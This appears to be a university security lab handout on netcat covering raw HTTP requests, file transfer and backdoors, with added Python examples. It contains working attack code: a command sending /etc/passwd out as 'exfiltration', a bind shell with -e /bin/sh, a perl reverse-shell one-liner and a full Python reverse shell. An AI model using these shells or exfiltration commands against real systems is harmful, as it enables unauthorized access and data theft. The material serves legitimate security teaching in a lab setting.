Netcat

Introduction

Netcat is often described as the Swiss Army knife of TCP/IP. It does a lot, and knowing how to use it is invaluable in security work. It is not the optimal tool for many jobs, but it is a lot quicker to use than reinventing the wheel.

Setup

To start the lab, clone the CS-354 repo (if you haven't already) and run the script for this lab.

git clone https://github.com/cs354/CS-354.git
bash CS-354/labs/ncat.bash

Since ncat is a network tool, we need a separate client to make connections to this server. Open your student environment in a separate shell; this will be your client. Keep both shells open side by side.

bash CS-354/student_environment.bash

Basic usage

Netcat's most basic use is as a replacement for telnet: it opens a TCP connection and connects your keyboard and screen to it. Try the following in the client:

$ nc www.northwestern.edu 80
GET / HTTP/1.1^M
Host: www.northwestern.edu^M
^M

Where it says ^M, you actually have to press control-v and then enter. Control-v tells the terminal to insert the next key literally, so control-v followed by enter inserts a carriage return (^M); the enter you press afterwards supplies the line feed, giving the CRLF line ending that HTTP requires. The final line containing only ^M is the blank line that ends the headers. Note that plain nc cannot speak TLS, so this only works against a server that still answers on port 80; for port 443 you need something like ncat --ssl or openssl s_client. Optionally, you can add more headers to your request:

$ nc www.northwestern.edu 80
GET / HTTP/1.1^M
Host: www.northwestern.edu^M
Accept: text/html;q=0.9,text/plain;q=0.8^M
User-Agent: Mozilla/5.0 (Unknown; en-us)^M
Accept-Language: en-us,en;q=0.5^M
^M

Another way to do this (which allows you to avoid pressing control-v all the time) is to pipe the output of some command to netcat. Here's an example:

$ ruby -e 'print "GET / HTTP/1.1\r\nHost: www.northwestern.edu\r\n\r\n"' | nc www.northwestern.edu 80

Common command line flags

Transferring files

One thing you might come across is a host you can reach, but it is hard to get files on or off the machine. Netcat can easily transfer files for you. On the machine that will receive the file (we'll use the student env container for this, as if we were exfiltrating data from a server):

$ nc -vv -l -p 3000 > file

And on the machine from which you want to send the file (the other shell):

$ nc -vv hostname 3000 < /etc/passwd

Replace hostname with cs354-local (or cs354-NETID on vicious).

These simple commands just shovel the contents of a file over a TCP connection: the sender writes the file to the socket, and the receiver writes whatever arrives to disk until the connection closes. Netcat does no integrity checking, so compare sha256sum output on both ends after a transfer. Depending on the netcat build, the sender may not close the connection when it hits end of file; if the receiver hangs, add -q 1 (netcat-traditional) or -N (OpenBSD nc) on the sending side. If you try this between real hosts, note that in many cases these transfers will be filtered by a firewall. Try transferring a file from a machine in the Wilkinson lab to hamsa.
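Both procedures above (the HTTP request typed by hand and the listener/sender pair used for the file transfer) come down to the same thing: move raw bytes over a TCP connection until one side closes. The following Python example is added here to show what nc is doing under the hood; it is not part of the original lab or the CS-354 repo. It builds a correctly CRLF-framed HTTP/1.1 request, and it implements the receiver (`nc -l -p PORT > file`) and sender (`nc HOST PORT < file`) sides of a transfer on localhost with a sha256 check at the end. The sample passwd lines are constructed, and the hostnames and port choices are assumptions for the demo.

```python
"""Netcat-style raw TCP in Python: an HTTP/1.1 request builder, a one-shot
listener (nc -l -p PORT > file) and a sender (nc HOST PORT < file)."""
import hashlib
import socket
import threading


def http_request(host, path="/", headers=None):
    """Build the raw bytes nc sends for a minimal HTTP/1.1 GET.

    HTTP requires CRLF ("\\r\\n") after every line and an empty line to end
    the headers; this is what the Ctrl-V Enter (^M) keystrokes produce."""
    lines = [f"GET {path} HTTP/1.1", f"Host: {host}"]
    for name, value in (headers or {}).items():
        lines.append(f"{name}: {value}")
    lines.append("Connection: close")  # ask the server to close after one response
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


class Listener:
    """Equivalent of `nc -vv -l -p PORT > file`: accept one connection,
    read until the peer closes, and keep the bytes."""

    def __init__(self, host="127.0.0.1", port=0):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((host, port))  # port 0: let the OS pick a free port
        self.sock.listen(1)
        self.port = self.sock.getsockname()[1]
        self.data = b""

    def serve_once(self):
        conn, _peer = self.sock.accept()
        with conn:
            chunks = []
            while True:
                chunk = conn.recv(65536)
                if not chunk:  # EOF: the sender closed or shut down its write side
                    break
                chunks.append(chunk)
            self.data = b"".join(chunks)
        self.sock.close()
        return self.data


def send_bytes(host, port, payload):
    """Equivalent of `nc HOST PORT < file`: connect, shovel the payload,
    then shut down the write side so the receiver sees EOF (the effect of
    -q 1 / -N in nc), and return whatever the peer sends back."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
        reply = []
        while True:
            chunk = s.recv(65536)
            if not chunk:
                break
            reply.append(chunk)
    return b"".join(reply)


def sha256(data):
    return hashlib.sha256(data).hexdigest()


def transfer(payload, host="127.0.0.1"):
    """Push payload through a local Listener and verify it arrived intact.

    nc itself does no integrity checking, so hash both ends, as you would
    with sha256sum after a real transfer. Returns (ok, received_bytes)."""
    listener = Listener(host)
    t = threading.Thread(target=listener.serve_once)
    t.start()
    send_bytes(host, listener.port, payload)
    t.join(timeout=5)
    return sha256(payload) == sha256(listener.data), listener.data


if __name__ == "__main__":
    # Constructed sample "file" standing in for /etc/passwd.
    sample = (b"root:x:0:0:root:/root:/bin/bash\n"
              b"nobody:x:65534:65534::/nonexistent:/usr/sbin/nologin\n")
    ok, received = transfer(sample)
    print("intact:", ok, "bytes received:", len(received))
    print(http_request("www.northwestern.edu").decode())
```

The shutdown(SHUT_WR) in send_bytes is the detail that matters: it is the sender's end-of-file that tells the receiver the file is complete, which is why a netcat build that never closes after stdin is exhausted leaves the listener waiting.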

Creating a simple backdoor

Netcat has the ability to execute programs when it receives a connection. This feature can be used to easily create a back door to a machine. (On the server)

$ nc -l -p 3000 -e /bin/sh

And now from your student environment (replace ncat-local with ncat-NETID if on vicious):

$ nc ncat-local 3000

Then try typing 'ls' or any other command.

However, the -e flag has been removed from some netcat builds (OpenBSD's nc, for example; Nmap's ncat still provides it as -e/--exec, and we've made sure it's available for this lab). When it is missing you can get the same effect from whatever language is on the host, for example with the following perl, though it is not as quiet. Note that the direction is reversed here: the student environment listens and the server connects back to it (a reverse shell rather than the bind shell above), which is also the form that works when a firewall blocks inbound connections to the server:

$client> nc -nvlp 3000
$server> perl -e 'use Socket;$i="cs354-local";$p=3000;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Here's a great compilation of reverse shells in various languages; note that all of them use netcat as the listener and whatever language is available on the host to connect back to it: reverse-shell-cheat-sheet/
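The perl one-liner above works by connecting back to the listener and pointing the shell's standard input, output and error at the socket, so the same trick can be written in any language. The following Python example is added here (it is not from the lab, the repo or the cheat sheet) and does exactly that, together with a small catcher that stands in for `nc -nvlp 3000` so the two halves can be run against each other on localhost. The command sent, the port choice and the use of 127.0.0.1 are assumptions for the demo.

```python
"""A reverse shell in Python, the same trick as the perl one-liner, plus a
minimal catcher standing in for `nc -nvlp PORT` so the pair can be tested."""
import socket
import subprocess
import threading


def reverse_shell(host, port, shell="/bin/sh"):
    """Connect back to host:port and attach a shell to the socket.

    As in the perl version, the socket becomes the shell's stdin, stdout
    and stderr: Popen dup2()s the socket's descriptor onto fds 0, 1 and 2
    in the child before exec, so commands arrive from the network and
    output goes back out the same connection. Returns the shell's exit
    status once it terminates."""
    sock = socket.create_connection((host, port))
    proc = subprocess.Popen([shell, "-i"], stdin=sock, stdout=sock, stderr=sock)
    sock.close()  # the child holds its own copies of the descriptor
    return proc.wait()


class Catcher:
    """Stand-in for `nc -nvlp PORT`: accept the callback, send one command,
    then collect everything the shell writes until it exits."""

    def __init__(self, host="127.0.0.1", port=0):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((host, port))  # port 0: let the OS choose
        self.sock.listen(1)
        self.port = self.sock.getsockname()[1]
        self.output = b""

    def run(self, command):
        conn, _peer = self.sock.accept()
        with conn:
            # Send the command followed by 'exit' so the shell terminates;
            # shutting down our write side also gives the shell EOF on stdin.
            conn.sendall(command.encode() + b"\nexit\n")
            conn.shutdown(socket.SHUT_WR)
            chunks = []
            while True:
                chunk = conn.recv(4096)
                if not chunk:  # the shell exited and its end of the socket closed
                    break
                chunks.append(chunk)
        self.output = b"".join(chunks)
        self.sock.close()
        return self.output


def demo(command="id", host="127.0.0.1"):
    """Run the catcher and the reverse shell against each other on localhost.
    Returns (shell exit status, bytes the catcher received)."""
    catcher = Catcher(host)
    t = threading.Thread(target=catcher.run, args=(command,))
    t.start()
    status = reverse_shell(host, catcher.port)
    t.join(timeout=10)
    return status, catcher.output


if __name__ == "__main__":
    status, out = demo("echo reverse-shell-ok")
    print(out.decode(errors="replace"))
    print("shell exited with status", status)
```

Because the shell's three standard descriptors are the socket, anything it prints, including the interactive prompt and error messages, goes to the listener. That is also what makes this easy to spot on the host: a shell process whose fds 0, 1 and 2 point at a TCP socket (visible under /proc/PID/fd) is the classic signature of a netcat-style shell.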

Additional

There is a lot that you can do with netcat, and a short tutorial doesn't do it justice. If you have time, read through the man page (man nc, or man netcat depending on the build) or search online for things to try with it.

Classwork

Show that you can successfully download the webpage www.google.com. Transfer an arbitrary file using netcat. Show that you can create a netcat backdoor and demonstrate an understanding of netcat's usefulness as both a TCP client and a TCP server.